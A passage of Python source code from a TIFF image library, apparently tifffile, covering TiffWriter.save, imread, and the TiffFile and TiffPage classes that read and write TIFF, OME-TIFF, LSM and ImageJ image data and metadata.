self._bigtiff = False self._offset_size = 4 self._tag_size = 12 self._numtag_format = 'H' self._offset_format = 'I' self._val_format = '4s' self._fh.write(struct.pack(byteorder+'H', 42)) # first IFD self._ifd_offset = self._fh.tell() self._fh.write(struct.pack(byteorder+self._offset_format, 0)) def save(self, data, photometric=None, planarconfig=None, resolution=None, description=None, volume=False, writeshape=False, compress=0, extratags=()): """Write image data to TIFF file. Image data are written in one stripe per plane. Dimensions larger than 2 to 4 (depending on photometric mode, planar configuration, and SGI mode) are flattened and saved as separate pages. The 'sample_format' and 'bits_per_sample' TIFF tags are derived from the data type. Parameters ---------- data : array_like Input image. The last dimensions are assumed to be image depth, height, width, and samples. photometric : {'minisblack', 'miniswhite', 'rgb'} The color space of the image data. By default this setting is inferred from the data shape. planarconfig : {'contig', 'planar'} Specifies if samples are stored contiguous or in separate planes. By default this setting is inferred from the data shape. 'contig': last dimension contains samples. 'planar': third last dimension contains samples. resolution : (float, float) or ((int, int), (int, int)) X and Y resolution in dots per inch as float or rational numbers. description : str The subject of the image. Saved with the first page only. compress : int Values from 0 to 9 controlling the level of zlib compression. If 0, data are written uncompressed (default). volume : bool If True, volume data are stored in one tile (if applicable) using the SGI image_depth and tile_depth tags. Image width and depth must be multiple of 16. Few software can read this format, e.g. MeVisLab. writeshape : bool If True, write the data shape to the image_description tag if necessary and no other description is given. extratags: sequence of tuples Additional tags as [(code, dtype, count, value, writeonce)]. code : int The TIFF tag Id. dtype : str Data type of items in 'value' in Python struct format. One of B, s, H, I, 2I, b, h, i, f, d, Q, or q. count : int Number of data values. Not used for string values. value : sequence 'Count' values compatible with 'dtype'. writeonce : bool If True, the tag is written to the first page only. """ if photometric not in (None, 'minisblack', 'miniswhite', 'rgb'): raise ValueError("invalid photometric %s" % photometric) if planarconfig not in (None, 'contig', 'planar'): raise ValueError("invalid planarconfig %s" % planarconfig) if not 0 <= compress <= 9: raise ValueError("invalid compression level %s" % compress) fh = self._fh byteorder = self._byteorder numtag_format = self._numtag_format val_format = self._val_format offset_format = self._offset_format offset_size = self._offset_size tag_size = self._tag_size data = numpy.asarray(data, dtype=byteorder+data.dtype.char, order='C') data_shape = shape = data.shape data = numpy.atleast_2d(data) # normalize shape of data samplesperpixel = 1 extrasamples = 0 if volume and data.ndim < 3: volume = False if photometric is None: if planarconfig: photometric = 'rgb' elif data.ndim > 2 and shape[-1] in (3, 4): photometric = 'rgb' elif volume and data.ndim > 3 and shape[-4] in (3, 4): photometric = 'rgb' elif data.ndim > 2 and shape[-3] in (3, 4): photometric = 'rgb' else: photometric = 'minisblack' if planarconfig and len(shape) <= (3 if volume else 2): planarconfig = None photometric = 'minisblack' if photometric == 'rgb': if len(shape) < 3: raise ValueError("not a RGB(A) image") if len(shape) < 4: volume = False if planarconfig is None: if shape[-1] in (3, 4): planarconfig = 'contig' elif shape[-4 if volume else -3] in (3, 4): planarconfig = 'planar' elif shape[-1] > shape[-4 if volume else -3]: planarconfig = 'planar' else: planarconfig = 'contig' if planarconfig == 'contig': data = data.reshape((-1, 1) + shape[(-4 if volume else -3):]) samplesperpixel = data.shape[-1] else: data = data.reshape( (-1,) + shape[(-4 if volume else -3):] + (1,)) samplesperpixel = data.shape[1] if samplesperpixel > 3: extrasamples = samplesperpixel - 3 elif planarconfig and len(shape) > (3 if volume else 2): if planarconfig == 'contig': data = data.reshape((-1, 1) + shape[(-4 if volume else -3):]) samplesperpixel = data.shape[-1] else: data = data.reshape( (-1,) + shape[(-4 if volume else -3):] + (1,)) samplesperpixel = data.shape[1] extrasamples = samplesperpixel - 1 else: planarconfig = None # remove trailing 1s while len(shape) > 2 and shape[-1] == 1: shape = shape[:-1] if len(shape) < 3: volume = False if False and ( len(shape) > (3 if volume else 2) and shape[-1] < 5 and all(shape[-1] < i for i in shape[(-4 if volume else -3):-1])): # DISABLED: non-standard TIFF, e.g. (220, 320, 2) planarconfig = 'contig' samplesperpixel = shape[-1] data = data.reshape((-1, 1) + shape[(-4 if volume else -3):]) else: data = data.reshape( (-1, 1) + shape[(-3 if volume else -2):] + (1,)) if samplesperpixel == 2: warnings.warn("writing non-standard TIFF (samplesperpixel 2)") if volume and (data.shape[-2] % 16 or data.shape[-3] % 16): warnings.warn("volume width or length are not multiple of 16") volume = False data = numpy.swapaxes(data, 1, 2) data = data.reshape( (data.shape[0] * data.shape[1],) + data.shape[2:]) # data.shape is now normalized 5D or 6D, depending on volume # (pages, planar_samples, (depth,) height, width, contig_samples) assert len(data.shape) in (5, 6) shape = data.shape bytestr = bytes if sys.version[0] == '2' else ( lambda x: bytes(x, 'utf-8') if isinstance(x, str) else x) tags = [] # list of (code, ifdentry, ifdvalue, writeonce) if volume: # use tiles to save volume data tag_byte_counts = TiffWriter.TAGS['tile_byte_counts'] tag_offsets = TiffWriter.TAGS['tile_offsets'] else: # else use strips tag_byte_counts = TiffWriter.TAGS['strip_byte_counts'] tag_offsets = TiffWriter.TAGS['strip_offsets'] def pack(fmt, *val): return struct.pack(byteorder+fmt, *val) def addtag(code, dtype, count, value, writeonce=False): # Compute ifdentry & ifdvalue bytes from code, dtype, count, value. # Append (code, ifdentry, ifdvalue, writeonce) to tags list. code = int(TiffWriter.TAGS.get(code, code)) try: tifftype = TiffWriter.TYPES[dtype] except KeyError: raise ValueError("unknown dtype %s" % dtype) rawcount = count if dtype == 's': value = bytestr(value) + b'\0' count = rawcount = len(value) value = (value, ) if len(dtype) > 1: count *= int(dtype[:-1]) dtype = dtype[-1] ifdentry = [pack('HH', code, tifftype), pack(offset_format, rawcount)] ifdvalue = None if count == 1: if isinstance(value, (tuple, list)): value = value[0] ifdentry.append(pack(val_format, pack(dtype, value))) elif struct.calcsize(dtype) * count <= offset_size: ifdentry.append(pack(val_format, pack(str(count)+dtype, *value))) else: ifdentry.append(pack(offset_format, 0)) ifdvalue = pack(str(count)+dtype, *value) tags.append((code, b''.join(ifdentry), ifdvalue, writeonce)) def rational(arg, max_denominator=1000000): # return nominator and denominator from float or two integers try: f = Fraction.from_float(arg) except TypeError: f = Fraction(arg[0], arg[1]) f = f.limit_denominator(max_denominator) return f.numerator, f.denominator if self._software: addtag('software', 's', 0, self._software, writeonce=True) self._software = None # only save to first page if description: addtag('image_description', 's', 0, description, writeonce=True) elif writeshape and shape[0] > 1 and shape != data_shape: addtag('image_description', 's', 0, "shape=(%s)" % (",".join('%i' % i for i in data_shape)), writeonce=True) addtag('datetime', 's', 0, datetime.datetime.now().strftime("%Y:%m:%d %H:%M:%S"), writeonce=True) addtag('compression', 'H', 1, 32946 if compress else 1) addtag('orientation', 'H', 1, 1) addtag('image_width', 'I', 1, shape[-2]) addtag('image_length', 'I', 1, shape[-3]) if volume: addtag('image_depth', 'I', 1, shape[-4]) addtag('tile_depth', 'I', 1, shape[-4]) addtag('tile_width', 'I', 1, shape[-2]) addtag('tile_length', 'I', 1, shape[-3]) addtag('new_subfile_type', 'I', 1, 0 if shape[0] == 1 else 2) addtag('sample_format', 'H', 1, {'u': 1, 'i': 2, 'f': 3, 'c': 6}[data.dtype.kind]) addtag('photometric', 'H', 1, {'miniswhite': 0, 'minisblack': 1, 'rgb': 2}[photometric]) addtag('samples_per_pixel', 'H', 1, samplesperpixel) if planarconfig and samplesperpixel > 1: addtag('planar_configuration', 'H', 1, 1 if planarconfig == 'contig' else 2) addtag('bits_per_sample', 'H', samplesperpixel, (data.dtype.itemsize * 8, ) * samplesperpixel) else: addtag('bits_per_sample', 'H', 1, data.dtype.itemsize * 8) if extrasamples: if photometric == 'rgb' and extrasamples == 1: addtag('extra_samples', 'H', 1, 1) # associated alpha channel else: addtag('extra_samples', 'H', extrasamples, (0,) * extrasamples) if resolution: addtag('x_resolution', '2I', 1, rational(resolution[0])) addtag('y_resolution', '2I', 1, rational(resolution[1])) addtag('resolution_unit', 'H', 1, 2) addtag('rows_per_strip', 'I', 1, shape[-3] * (shape[-4] if volume else 1)) # use one strip or tile per plane strip_byte_counts = (data[0, 0].size * data.dtype.itemsize,) * shape[1] addtag(tag_byte_counts, offset_format, shape[1], strip_byte_counts) addtag(tag_offsets, offset_format, shape[1], (0, ) * shape[1]) # add extra tags from users for t in extratags: addtag(*t) # the entries in an IFD must be sorted in ascending order by tag code tags = sorted(tags, key=lambda x: x[0]) if not self._bigtiff and (fh.tell() + data.size*data.dtype.itemsize > 2**31-1): raise ValueError("data too large for non-bigtiff file") for pageindex in range(shape[0]): # update pointer at ifd_offset pos = fh.tell() fh.seek(self._ifd_offset) fh.write(pack(offset_format, pos)) fh.seek(pos) # write ifdentries fh.write(pack(numtag_format, len(tags))) tag_offset = fh.tell() fh.write(b''.join(t[1] for t in tags)) self._ifd_offset = fh.tell() fh.write(pack(offset_format, 0)) # offset to next IFD # write tag values and patch offsets in ifdentries, if necessary for tagindex, tag in enumerate(tags): if tag[2]: pos = fh.tell() fh.seek(tag_offset + tagindex*tag_size + offset_size + 4) fh.write(pack(offset_format, pos)) fh.seek(pos) if tag[0] == tag_offsets: strip_offsets_offset = pos elif tag[0] == tag_byte_counts: strip_byte_counts_offset = pos fh.write(tag[2]) # write image data data_offset = fh.tell() if compress: strip_byte_counts = [] for plane in data[pageindex]: plane = zlib.compress(plane, compress) strip_byte_counts.append(len(plane)) fh.write(plane) else: # if this fails try update Python/numpy data[pageindex].tofile(fh) fh.flush() # update strip and tile offsets and byte_counts if necessary pos = fh.tell() for tagindex, tag in enumerate(tags): if tag[0] == tag_offsets: # strip or tile offsets if tag[2]: fh.seek(strip_offsets_offset) strip_offset = data_offset for size in strip_byte_counts: fh.write(pack(offset_format, strip_offset)) strip_offset += size else: fh.seek(tag_offset + tagindex*tag_size + offset_size + 4) fh.write(pack(offset_format, data_offset)) elif tag[0] == tag_byte_counts: # strip or tile byte_counts if compress: if tag[2]: fh.seek(strip_byte_counts_offset) for size in strip_byte_counts: fh.write(pack(offset_format, size)) else: fh.seek(tag_offset + tagindex*tag_size + offset_size + 4) fh.write(pack(offset_format, strip_byte_counts[0])) break fh.seek(pos) fh.flush() # remove tags that should be written only once if pageindex == 0: tags = [t for t in tags if not t[-1]] def close(self): self._fh.close() def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() def imread(files, **kwargs): """Return image data from TIFF file(s) as numpy array. The first image series is returned if no arguments are provided. Parameters ---------- files : str or list File name, glob pattern, or list of file names. key : int, slice, or sequence of page indices Defines which pages to return as array. series : int Defines which series of pages in file to return as array. multifile : bool If True (default), OME-TIFF data may include pages from multiple files. pattern : str Regular expression pattern that matches axes names and indices in file names. kwargs : dict Additional parameters passed to the TiffFile or TiffSequence asarray function. Examples -------- >>> im = imread('test.tif', key=0) >>> im.shape (256, 256, 4) >>> ims = imread(['test.tif', 'test.tif']) >>> ims.shape (2, 256, 256, 4) """ kwargs_file = {} if 'multifile' in kwargs: kwargs_file['multifile'] = kwargs['multifile'] del kwargs['multifile'] else: kwargs_file['multifile'] = True kwargs_seq = {} if 'pattern' in kwargs: kwargs_seq['pattern'] = kwargs['pattern'] del kwargs['pattern'] if isinstance(files, basestring) and any(i in files for i in '?*'): files = glob.glob(files) if not files: raise ValueError('no files found') if len(files) == 1: files = files[0] if isinstance(files, basestring): with TiffFile(files, **kwargs_file) as tif: return tif.asarray(**kwargs) else: with TiffSequence(files, **kwargs_seq) as imseq: return imseq.asarray(**kwargs) class lazyattr(object): """Lazy object attribute whose value is computed on first access.""" __slots__ = ('func', ) def __init__(self, func): self.func = func def __get__(self, instance, owner): if instance is None: return self value = self.func(instance) if value is NotImplemented: return getattr(super(owner, instance), self.func.__name__) setattr(instance, self.func.__name__, value) return value class TiffFile(object): """Read image and metadata from TIFF, STK, LSM, and FluoView files. TiffFile instances must be closed using the close method, which is automatically called when using the 'with' statement. Attributes ---------- pages : list All TIFF pages in file. series : list of Records(shape, dtype, axes, TiffPages) TIFF pages with compatible shapes and types. micromanager_metadata: dict Extra MicroManager non-TIFF metadata in the file, if exists. All attributes are read-only. Examples -------- >>> with TiffFile('test.tif') as tif: ... data = tif.asarray() ... data.shape (256, 256, 4) """ def __init__(self, arg, name=None, offset=None, size=None, multifile=True, multifile_close=True): """Initialize instance from file. Parameters ---------- arg : str or open file Name of file or open file object. The file objects are closed in TiffFile.close(). name : str Optional name of file in case 'arg' is a file handle. offset : int Optional start position of embedded file. By default this is the current file position. size : int Optional size of embedded file. By default this is the number of bytes from the 'offset' to the end of the file. multifile : bool If True (default), series may include pages from multiple files. Currently applies to OME-TIFF only. multifile_close : bool If True (default), keep the handles of other files in multifile series closed. This is inefficient when few files refer to many pages. If False, the C runtime may run out of resources. """ self._fh = FileHandle(arg, name=name, offset=offset, size=size) self.offset_size = None self.pages = [] self._multifile = bool(multifile) self._multifile_close = bool(multifile_close) self._files = {self._fh.name: self} # cache of TiffFiles try: self._fromfile() except Exception: self._fh.close() raise @property def filehandle(self): """Return file handle.""" return self._fh @property def filename(self): """Return name of file handle.""" return self._fh.name def close(self): """Close open file handle(s).""" for tif in self._files.values(): tif._fh.close() self._files = {} def _fromfile(self): """Read TIFF header and all page records from file.""" self._fh.seek(0) try: self.byteorder = {b'II': '<', b'MM': '>'}[self._fh.read(2)] except KeyError: raise ValueError("not a valid TIFF file") version = struct.unpack(self.byteorder+'H', self._fh.read(2))[0] if version == 43: # BigTiff self.offset_size, zero = struct.unpack(self.byteorder+'HH', self._fh.read(4)) if zero or self.offset_size != 8: raise ValueError("not a valid BigTIFF file") elif version == 42: self.offset_size = 4 else: raise ValueError("not a TIFF file") self.pages = [] while True: try: page = TiffPage(self) self.pages.append(page) except StopIteration: break if not self.pages: raise ValueError("empty TIFF file") if self.is_micromanager: # MicroManager files contain metadata not stored in TIFF tags. self.micromanager_metadata = read_micromanager_metadata(self._fh) if self.is_lsm: self._fix_lsm_strip_offsets() self._fix_lsm_strip_byte_counts() def _fix_lsm_strip_offsets(self): """Unwrap strip offsets for LSM files greater than 4 GB.""" for series in self.series: wrap = 0 previous_offset = 0 for page in series.pages: strip_offsets = [] for current_offset in page.strip_offsets: if current_offset < previous_offset: wrap += 2**32 strip_offsets.append(current_offset + wrap) previous_offset = current_offset page.strip_offsets = tuple(strip_offsets) def _fix_lsm_strip_byte_counts(self): """Set strip_byte_counts to size of compressed data. The strip_byte_counts tag in LSM files contains the number of bytes for the uncompressed data. """ if not self.pages: return strips = {} for page in self.pages: assert len(page.strip_offsets) == len(page.strip_byte_counts) for offset, bytecount in zip(page.strip_offsets, page.strip_byte_counts): strips[offset] = bytecount offsets = sorted(strips.keys()) offsets.append(min(offsets[-1] + strips[offsets[-1]], self._fh.size)) for i, offset in enumerate(offsets[:-1]): strips[offset] = min(strips[offset], offsets[i+1] - offset) for page in self.pages: if page.compression: page.strip_byte_counts = tuple( strips[offset] for offset in page.strip_offsets) @lazyattr def series(self): """Return series of TiffPage with compatible shape and properties.""" if not self.pages: return [] series = [] page0 = self.pages[0] if self.is_ome: series = self._omeseries() elif self.is_fluoview: dims = {b'X': 'X', b'Y': 'Y', b'Z': 'Z', b'T': 'T', b'WAVELENGTH': 'C', b'TIME': 'T', b'XY': 'R', b'EVENT': 'V', b'EXPOSURE': 'L'} mmhd = list(reversed(page0.mm_header.dimensions)) series = [Record( axes=''.join(dims.get(i[0].strip().upper(), 'Q') for i in mmhd if i[1] > 1), shape=tuple(int(i[1]) for i in mmhd if i[1] > 1), pages=self.pages, dtype=numpy.dtype(page0.dtype))] elif self.is_lsm: lsmi = page0.cz_lsm_info axes = CZ_SCAN_TYPES[lsmi.scan_type] if page0.is_rgb: axes = axes.replace('C', '').replace('XY', 'XYC') axes = axes[::-1] shape = tuple(getattr(lsmi, CZ_DIMENSIONS[i]) for i in axes) pages = [p for p in self.pages if not p.is_reduced] series = [Record(axes=axes, shape=shape, pages=pages, dtype=numpy.dtype(pages[0].dtype))] if len(pages) != len(self.pages): # reduced RGB pages pages = [p for p in self.pages if p.is_reduced] cp = 1 i = 0 while cp < len(pages) and i < len(shape)-2: cp *= shape[i] i += 1 shape = shape[:i] + pages[0].shape axes = axes[:i] + 'CYX' series.append(Record(axes=axes, shape=shape, pages=pages, dtype=numpy.dtype(pages[0].dtype))) elif self.is_imagej: shape = [] axes = [] ij = page0.imagej_tags if 'frames' in ij: shape.append(ij['frames']) axes.append('T') if 'slices' in ij: shape.append(ij['slices']) axes.append('Z') if 'channels' in ij and not self.is_rgb: shape.append(ij['channels']) axes.append('C') remain = len(self.pages) // (product(shape) if shape else 1) if remain > 1: shape.append(remain) axes.append('I') shape.extend(page0.shape) axes.extend(page0.axes) axes = ''.join(axes) series = [Record(pages=self.pages, shape=tuple(shape), axes=axes, dtype=numpy.dtype(page0.dtype))] elif self.is_nih: if len(self.pages) == 1: shape = page0.shape axes = page0.axes else: shape = (len(self.pages),) + page0.shape axes = 'I' + page0.axes series = [Record(pages=self.pages, shape=shape, axes=axes, dtype=numpy.dtype(page0.dtype))] elif page0.is_shaped: # TODO: shaped files can contain multiple series shape = page0.tags['image_description'].value[7:-1] shape = tuple(int(i) for i in shape.split(b',')) series = [Record(pages=self.pages, shape=shape, axes='Q' * len(shape), dtype=numpy.dtype(page0.dtype))] # generic detection of series if not series: shapes = [] pages = {} for page in self.pages: if not page.shape: continue shape = page.shape + (page.axes, page.compression in TIFF_DECOMPESSORS) if shape not in pages: shapes.append(shape) pages[shape] = [page] else: pages[shape].append(page) series = [Record(pages=pages[s], axes=(('I' + s[-2]) if len(pages[s]) > 1 else s[-2]), dtype=numpy.dtype(pages[s][0].dtype), shape=((len(pages[s]), ) + s[:-2] if len(pages[s]) > 1 else s[:-2])) for s in shapes] # remove empty series, e.g. in MD Gel files series = [s for s in series if sum(s.shape) > 0] return series def asarray(self, key=None, series=None, memmap=False): """Return image data from multiple TIFF pages as numpy array. By default the first image series is returned. Parameters ---------- key : int, slice, or sequence of page indices Defines which pages to return as array. series : int Defines which series of pages to return as array. memmap : bool If True, return an array stored in a binary file on disk if possible. """ if key is None and series is None: series = 0 if series is not None: pages = self.series[series].pages else: pages = self.pages if key is None: pass elif isinstance(key, int): pages = [pages[key]] elif isinstance(key, slice): pages = pages[key] elif isinstance(key, collections.Iterable): pages = [pages[k] for k in key] else: raise TypeError("key must be an int, slice, or sequence") if not len(pages): raise ValueError("no pages selected") if self.is_nih: if pages[0].is_palette: result = stack_pages(pages, colormapped=False, squeeze=False) result = numpy.take(pages[0].color_map, result, axis=1) result = numpy.swapaxes(result, 0, 1) else: result = stack_pages(pages, memmap=memmap, colormapped=False, squeeze=False) elif len(pages) == 1: return pages[0].asarray(memmap=memmap) elif self.is_ome: assert not self.is_palette, "color mapping disabled for ome-tiff" if any(p is None for p in pages): # zero out missing pages firstpage = next(p for p in pages if p) nopage = numpy.zeros_like( firstpage.asarray(memmap=False)) s = self.series[series] if memmap: with tempfile.NamedTemporaryFile() as fh: result = numpy.memmap(fh, dtype=s.dtype, shape=s.shape) result = result.reshape(-1) else: result = numpy.empty(s.shape, s.dtype).reshape(-1) index = 0 class KeepOpen: # keep Tiff files open between consecutive pages def __init__(self, parent, close): self.master = parent self.parent = parent self._close = close def open(self, page): if self._close and page and page.parent != self.parent: if self.parent != self.master: self.parent.filehandle.close() self.parent = page.parent self.parent.filehandle.open() def close(self): if self._close and self.parent != self.master: self.parent.filehandle.close() keep = KeepOpen(self, self._multifile_close) for page in pages: keep.open(page) if page: a = page.asarray(memmap=False, colormapped=False, reopen=False) else: a = nopage try: result[index:index + a.size] = a.reshape(-1) except ValueError as e: warnings.warn("ome-tiff: %s" % e) break index += a.size keep.close() else: result = stack_pages(pages, memmap=memmap) if key is None: try: result.shape = self.series[series].shape except ValueError: try: warnings.warn("failed to reshape %s to %s" % ( result.shape, self.series[series].shape)) # try series of expected shapes result.shape = (-1,) + self.series[series].shape except ValueError: # revert to generic shape result.shape = (-1,) + pages[0].shape else: result.shape = (-1,) + pages[0].shape return result def _omeseries(self): """Return image series in OME-TIFF file(s).""" root = etree.fromstring(self.pages[0].tags['image_description'].value.decode(errors='ignore')) uuid = root.attrib.get('UUID', None) self._files = {uuid: self} dirname = self._fh.dirname modulo = {} result = [] for element in root: if element.tag.endswith('BinaryOnly'): warnings.warn("ome-xml: not an ome-tiff master file") break if element.tag.endswith('StructuredAnnotations'): for annot in element: if not annot.attrib.get('Namespace', '').endswith('modulo'): continue for value in annot: for modul in value: for along in modul: if not along.tag[:-1].endswith('Along'): continue axis = along.tag[-1] newaxis = along.attrib.get('Type', 'other') newaxis = AXES_LABELS[newaxis] if 'Start' in along.attrib: labels = range( int(along.attrib['Start']), int(along.attrib['End']) + 1, int(along.attrib.get('Step', 1))) else: labels = [label.text for label in along if label.tag.endswith('Label')] modulo[axis] = (newaxis, labels) if not element.tag.endswith('Image'): continue for pixels in element: if not pixels.tag.endswith('Pixels'): continue atr = pixels.attrib dtype = atr.get('Type', None) axes = ''.join(reversed(atr['DimensionOrder'])) shape = list(int(atr['Size'+ax]) for ax in axes) size = product(shape[:-2]) ifds = [None] * size for data in pixels: if not data.tag.endswith('TiffData'): continue atr = data.attrib ifd = int(atr.get('IFD', 0)) num = int(atr.get('NumPlanes', 1 if 'IFD' in atr else 0)) num = int(atr.get('PlaneCount', num)) idx = [int(atr.get('First'+ax, 0)) for ax in axes[:-2]] try: idx = numpy.ravel_multi_index(idx, shape[:-2]) except ValueError: # ImageJ produces invalid ome-xml when cropping warnings.warn("ome-xml: invalid TiffData index") continue for uuid in data: if not uuid.tag.endswith('UUID'): continue if uuid.text not in self._files: if not self._multifile: # abort reading multifile OME series # and fall back to generic series return [] fname = uuid.attrib['FileName'] try: tif = TiffFile(os.path.join(dirname, fname)) except (IOError, ValueError): tif.close() warnings.warn( "ome-xml: failed to read '%s'" % fname) break self._files[uuid.text] = tif if self._multifile_close: tif.close() pages = self._files[uuid.text].pages try: for i in range(num if num else len(pages)): ifds[idx + i] = pages[ifd + i] except IndexError: warnings.warn("ome-xml: index out of range") # only process first uuid break else: pages = self.pages try: for i in range(num if num else len(pages)): ifds[idx + i] = pages[ifd + i] except IndexError: warnings.warn("ome-xml: index out of range") if all(i is None for i in ifds): # skip images without data continue dtype = next(i for i in ifds if i).dtype result.append(Record(axes=axes, shape=shape, pages=ifds, dtype=numpy.dtype(dtype))) for record in result: for axis, (newaxis, labels) in modulo.items(): i = record.axes.index(axis) size = len(labels) if record.shape[i] == size: record.axes = record.axes.replace(axis, newaxis, 1) else: record.shape[i] //= size record.shape.insert(i+1, size) record.axes = record.axes.replace(axis, axis+newaxis, 1) record.shape = tuple(record.shape) # # squeeze dimensions # for record in result: # record.shape, record.axes = squeeze_axes(record.shape, record.axes) return result def __len__(self): """Return number of image pages in file.""" return len(self.pages) def __getitem__(self, key): """Return specified page.""" return self.pages[key] def __iter__(self): """Return iterator over pages.""" return iter(self.pages) def __str__(self): """Return string containing information about file.""" result = [ self._fh.name.capitalize(), format_size(self._fh.size), {'<': 'little endian', '>': 'big endian'}[self.byteorder]] if self.is_bigtiff: result.append("bigtiff") if len(self.pages) > 1: result.append("%i pages" % len(self.pages)) if len(self.series) > 1: result.append("%i series" % len(self.series)) if len(self._files) > 1: result.append("%i files" % (len(self._files))) return ", ".join(result) def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() @lazyattr def fstat(self): try: return os.fstat(self._fh.fileno()) except Exception: # io.UnsupportedOperation return None @lazyattr def is_bigtiff(self): return self.offset_size != 4 @lazyattr def is_rgb(self): return all(p.is_rgb for p in self.pages) @lazyattr def is_palette(self): return all(p.is_palette for p in self.pages) @lazyattr def is_mdgel(self): return any(p.is_mdgel for p in self.pages) @lazyattr def is_mediacy(self): return any(p.is_mediacy for p in self.pages) @lazyattr def is_stk(self): return all(p.is_stk for p in self.pages) @lazyattr def is_lsm(self): return self.pages[0].is_lsm @lazyattr def is_imagej(self): return self.pages[0].is_imagej @lazyattr def is_micromanager(self): return self.pages[0].is_micromanager @lazyattr def is_nih(self): return self.pages[0].is_nih @lazyattr def is_fluoview(self): return self.pages[0].is_fluoview @lazyattr def is_ome(self): return self.pages[0].is_ome class TiffPage(object): """A TIFF image file directory (IFD). Attributes ---------- index : int Index of page in file. dtype : str {TIFF_SAMPLE_DTYPES} Data type of image, colormapped if applicable. shape : tuple Dimensions of the image array in TIFF page, colormapped and with one alpha channel if applicable. axes : str Axes label codes: 'X' width, 'Y' height, 'S' sample, 'I' image series|page|plane, 'Z' depth, 'C' color|em-wavelength|channel, 'E' ex-wavelength|lambda, 'T' time, 'R' region|tile, 'A' angle, 'P' phase, 'H' lifetime, 'L' exposure, 'V' event, 'Q' unknown, '_' missing tags : TiffTags Dictionary of tags in page. Tag values are also directly accessible as attributes. color_map : numpy array Color look up table, if exists. cz_lsm_scan_info: Record(dict) LSM scan info attributes, if exists. imagej_tags: Record(dict) Consolidated ImageJ description and metadata tags, if exists. uic_tags: Record(dict) Consolidated MetaMorph STK/UIC tags, if exists. All attributes are read-only. Notes ----- The internal, normalized '_shape' attribute is 6 dimensional: 0. number planes (stk) 1. planar samples_per_pixel 2. image_depth Z (sgi) 3. image_length Y 4. image_width X 5. contig samples_per_pixel """ def __init__(self, parent): """Initialize instance from file.""" self.parent = parent self.index = len(parent.pages) self.shape = self._shape = () self.dtype = self._dtype = None self.axes = "" self.tags = TiffTags() self._fromfile() self._process_tags() def _fromfile(self): """Read TIFF IFD structure and its tags from file. File cursor must be at storage position of IFD offset and is left at offset to next IFD. Raises StopIteration if offset (first bytes read) is 0. """ fh = self.parent.filehandle byteorder = self.parent.byteorder offset_size = self.parent.offset_size fmt = {4: 'I', 8: 'Q'}[offset_size] offset = struct.unpack(byteorder + fmt, fh.read(offset_size))[0] if not offset: raise StopIteration() # read standard tags tags = self.tags fh.seek(offset) fmt, size = {4: ('H', 2), 8: ('Q', 8)}[offset_size] try: numtags = struct.unpack(byteorder + fmt, fh.read(size))[0] except Exception: warnings.warn("corrupted page list") raise StopIteration() tagcode = 0 for _ in range(numtags): try: tag = TiffTag(self.parent) # print(tag) except TiffTag.Error as e: warnings.warn(str(e)) continue if tagcode > tag.code: # expected for early LSM and tifffile versions warnings.warn("tags are not ordered by code") tagcode = tag.code if tag.name not in tags: tags[tag.name] = tag else: # some files contain multiple IFD with same code # e.g. MicroManager files contain two image_description i = 1 while True: name = "%s_%i" % (tag.name, i) if name not in tags: tags[name] = tag break pos = fh.tell() if self.is_lsm or (self.index and self.parent.is_lsm): # correct non standard LSM bitspersample tags self.tags['bits_per_sample']._correct_lsm_bitspersample(self) if self.is_lsm: # read LSM info subrecords for name, reader in CZ_LSM_INFO_READERS.items(): try: offset = self.cz_lsm_info['offset_'+name] except KeyError: continue if offset < 8: # older LSM revision continue fh.seek(offset) try: setattr(self, 'cz_lsm_'+name, reader(fh)) except ValueError: pass elif self.is_stk and 'uic1tag' in tags and not tags['uic1tag'].value: # read uic1tag now that plane count is known uic1tag = tags['uic1tag'] fh.seek(uic1tag.value_offset) tags['uic1tag'].value = Record( read_uic1tag(fh, byteorder, uic1tag.dtype, uic1tag.count, tags['uic2tag'].count)) fh.seek(pos) def _process_tags(self): """Validate standard tags and initialize attributes. Raise ValueError if tag values are not supported. """ tags = self.tags for code, (name, default, dtype, count, validate) in TIFF_TAGS.items(): if not (name in tags or default is None): tags[name] = TiffTag(code, dtype=dtype, count=count, value=default, name=name) if name in tags and validate: try: if tags[name].count == 1: setattr(self, name, validate[tags[name].value]) else: setattr(self, name, tuple( validate[value] for value in tags[name].value)) except KeyError: raise ValueError("%s.value (%s) not supported" % (name, tags[name].value)) tag = tags['bits_per_sample'] if tag.count == 1: self.bits_per_sample = tag.value else: # LSM might list more items than samples_per_pixel value = tag.value[:self.samples_per_pixel] if any((v-value[0] for v in value)): self.bits_per_sample = value else: self.bits_per_sample = value[0] tag = tags['sample_format'] if tag.count == 1: self.sample_format = TIFF_SAMPLE_FORMATS[tag.value] else: value = tag.value[:self.samples_per_pixel] if any((v-value[0] for v in value)): self.sample_format = [TIFF_SAMPLE_FORMATS[v] for v in value] else: self.sample_format = TIFF_SAMPLE_FORMATS[value[0]] if 'photometric' not in tags: self.photometric = None if 'image_depth' not in tags: self.image_depth = 1 if 'image_length' in tags: self.strips_per_image = int(math.floor( float(self.image_length + self.rows_per_strip - 1) / self.rows_per_strip)) else: self.strips_per_image = 0 key = (self.sample_format, self.bits_per_sample) self.dtype = self._dtype = TIFF_SAMPLE_DTYPES.get(key, None) if 'image_length' not in self.tags or 'image_width' not in self.tags: # some GEL file pages are missing image data self.image_length = 0 self.image_width = 0 self.image_depth = 0 self.strip_offsets = 0 self._shape = () self.shape = () self.axes = '' if self.is_palette: self.dtype = self.tags['color_map'].dtype[1] self.color_map = numpy.array(self.color_map, self.dtype) dmax = self.color_map.max() if dmax < 256: self.dtype = numpy.uint8 self.color_map = self.color_map.astype(self.dtype) #else: # self.dtype = numpy.uint8 # self.color_map >>= 8 # self.color_map = self.color_map.astype(self.dtype) self.color_map.shape = (3, -1) # determine shape of data image_length = self.image_length image_width = self.image_width image_depth = self.image_depth samples_per_pixel = self.samples_per_pixel if self.is_stk: assert self.image_depth == 1 planes = self.tags['uic2tag'].count if self.is_contig: self._shape = (planes, 1, 1, image_length, image_width, samples_per_pixel) if samples_per_pixel == 1: self.shape = (planes, image_length, image_width) self.axes = 'YX' else: self.shape = (planes, image_length, image_width, samples_per_pixel) self.axes = 'YXS' else: self._shape = (planes, samples_per_pixel, 1, image_length, image_width, 1) if samples_per_pixel == 1: self.shape = (planes, image_length, image_width) self.axes = 'YX' else: self.shape = (planes, samples_per_pixel, image_length, image_width) self.axes = 'SYX' # detect type of series if planes == 1: self.shape = self.shape[1:] elif numpy.all(self.uic2tag.z_distance != 0): self.axes = 'Z' + self.axes elif 